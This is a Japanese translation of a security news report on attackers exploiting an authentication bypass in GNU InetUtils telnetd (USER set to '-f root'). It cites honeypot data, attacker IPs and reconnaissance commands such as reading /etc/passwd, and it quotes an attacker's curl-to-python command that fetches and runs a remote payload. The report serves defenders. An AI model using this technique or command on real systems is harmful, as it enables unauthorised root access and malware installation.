脅威アクターは、概念実証(PoC)コードが一般公開された直後から、GNU InetUtils telnetdに存在する重大な認証回避の脆弱性を積極的に悪用し始めました。
この欠陥により、リモート攻撃者は認証なしでrootアクセスを取得でき、インターネットに公開されたシステム全体で広範な悪用の試行が引き起こされています。
このセキュリティ上の欠陥は、2015年3月に脆弱なコードが導入されたGNU InetUtils telnetdのバージョン1.9.3から2.7に影響します。
telnetdサーバーは、root権限で実行される /usr/bin/login バイナリに渡す前に、USER環境変数を適切にサニタイズできていません。
悪意のあるクライアントが「-f root」という文字列を含むUSER環境変数を作成し、telnetの -a または --login パラメータを使用すると、telnetdサーバーは認証を一切要求せずに攻撃者をrootとして自動的にログインさせます。
これは、loginバイナリが -f フラグを通常の認証プロセスを回避するためのコマンドとして解釈するために発生します。
| 脆弱性の詳細 | |
|---|---|
| 深刻度 | 高 |
| 影響を受けるバージョン | GNU InetUtils 1.9.3〜2.7 |
| 攻撃ベクター | ネットワーク(TCPポート23) |
| 認証の必要性 | なし |
| 取得される権限 | rootアクセス |
| 公開日 | 2026年1月20日 |
技術的な悪用手法
この脆弱性は、telnetdがログインコマンドのテンプレートを構築する方法を悪用します。telnetd/telnetd.cファイルでは、loginの呼び出しに次のパターンが使用されています: PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"。
%U 変数は、クライアントから受け取ったUSER環境変数の値に、いかなるサニタイズも行わずに展開されます。
攻撃者は、初回接続のハンドシェイク中に悪意のあるUSER変数を埋め込んだTelnet IAC(Interpret As Command)ネゴシエーションパケットを送信することで、これを悪用します。
典型的なエクスプロイトのペイロードには、端末速度の設定(9600または38400ボーなど)、端末タイプの宣言(XTERM-256COLORなど)、そして重要な USER.-f root パラメータが含まれます。
この脆弱性は、研究者のKyu Neushwaistein(Carlos Cortes Alvarez)によって2026年1月19日に発見・報告されました。
セキュリティ研究者 Simon Josefsson published は2026年1月20日に公式アドバイザリを公開し、CVE識別子はまだ割り当てられていないものの、パッチは直ちに提供されたと述べました。
PoCの公開から数時間以内に、セキュリティ監視プラットフォームは広範な悪用の試行を検知しました。
GreyNoise Labs deployedは脆弱なハニーポットセンサーを展開し、2026年1月21日から始まる18時間の期間に、18個のユニークな攻撃者IPアドレスが60回の悪用試行を行ったことを観測しました。
最初の悪用活動は1月21日07:19:15(UTC)にIPアドレス38.145.220.204から発生し、最新の試行は1月22日04:08:41(UTC)に178.16.53.82から記録されました。
最も活発な攻撃者(178.16.53.82)は、10個のユニークなシステムを標的に12回の個別セッションを開始しました。
ネットワークトラフィック分析により、このキャンペーンに関連してキャプチャされた1,525個のパケットはすべて、TCPポート23上のTelnet プロトコル通信 であり、100%が悪性トラフィックであることが明らかになりました。
侵入検知システムは「GPL ATTACK_RESPONSE id check returned root」に対するアラートを発報し、一部の攻撃者がrootレベルのアクセス取得に成功したことを確認しました。
攻撃者の戦術とペイロード
セキュリティ研究者は複数の異なるペイロードの亜種を特定しており、攻撃者が多様な悪用ツールキットを使用していることを示しています:
端末速度の設定:
- 9600,9600ボー(攻撃者ソース2件)
- 38400,38400ボー(攻撃者ソース7件)
- 0,0ボー/ネゴシエーションなし(攻撃者ソース3件)
- 不明(最小限のペイロードのソース7件)
端末タイプの宣言:
- XTERM-256COLOR(ソース5件、大文字バリアント)
- xterm-256color(ソース3件、小文字バリアント)
- screen-256color(GNU Screenマルチプレクサを使用するソース1件)
- UNKNOWN(汎用的な端末タイプのソース4件)
攻撃者の大多数(83.3%)はrootアカウントを直接標的にしましたが、一部は「nobody」「daemon」、さらには架空の「nonexistent123」アカウントなど、低権限アカウントを用いて悪用を試みており、rootログイン試行を監視する検知システムを回避しようとする意図が示唆されます。
一部の攻撃者は、X11のDISPLAY変数を通じてインフラの詳細を不用意に露呈しており、「kali.kali:0.0」「MiniBear:0」「shared-vm2.localdomain:0」といったホスト名が含まれていました。これはKali Linuxのペネトレーションテスト用ディストリビューションや共有VPS環境の使用を示しています。
侵害されたシステムに侵入すると、攻撃者は標的をフィンガープリントするために自動化された偵察コマンドを実行しました:
textuname -a
id
cat /proc/cpuinfo
cat /etc/passwd
一部の攻撃者は、コマンド出力を「S」「U/EU」「blah」といった解析用デリミタで囲っており、インベントリ管理や脆弱性の相関付けのために、C2(コマンド&コントロール)基盤が自動収集していることを示唆します。
マルウェアの展開:
同一の攻撃者は、次のコマンドを使用して第2段階のPythonペイロードをダウンロードして実行しようとしました:
textnohup curl -fsSL http://67.220.95.16:8000/apps.py | python - [target_IP] > /dev/null &
このペイロード配信メカニズムは、シェル終了後も生存するバックグラウンド実行のために nohup を使用し、 curl でコードを静かにダウンロードして、Pythonのstdin経由で実行し、出力を抑制します。
67.220.95.16:8000のマルウェア配布サーバーは apps.py を配信していることが観測されており、ボットネットクライアントまたは暗号資産マイニング系マルウェアである可能性があります。
注目すべき点として、IPアドレス67.220.95.16は、悪用元であると同時にマルウェア配布サーバーとしても二重の役割を果たしていました。
これらのマルウェア展開の試行は、curlやPythonがインストールされていない強化されたハニーポットシステムでは概ね失敗しましたが、標準的なLinuxサーバーでデフォルトのツールが揃っている環境では成功する可能性があります。
セキュリティチームは直ちに、ネットワーク上で公開されているtelnetサービスを監査し、特にこの悪用キャンペーンで特定された18個の攻撃者IPアドレスからの不審なrootログイン試行について、認証ログを確認すべきです。
組織は、悪用が成功した場合は完全なシステム侵害として扱い、フォレンジック分析、認証情報のローテーション、システムの再構築を含むインシデント対応手順を実施すべきです。
翻訳元: https://gbhackers.com/attackers-leveraging-telnetd-exploit/
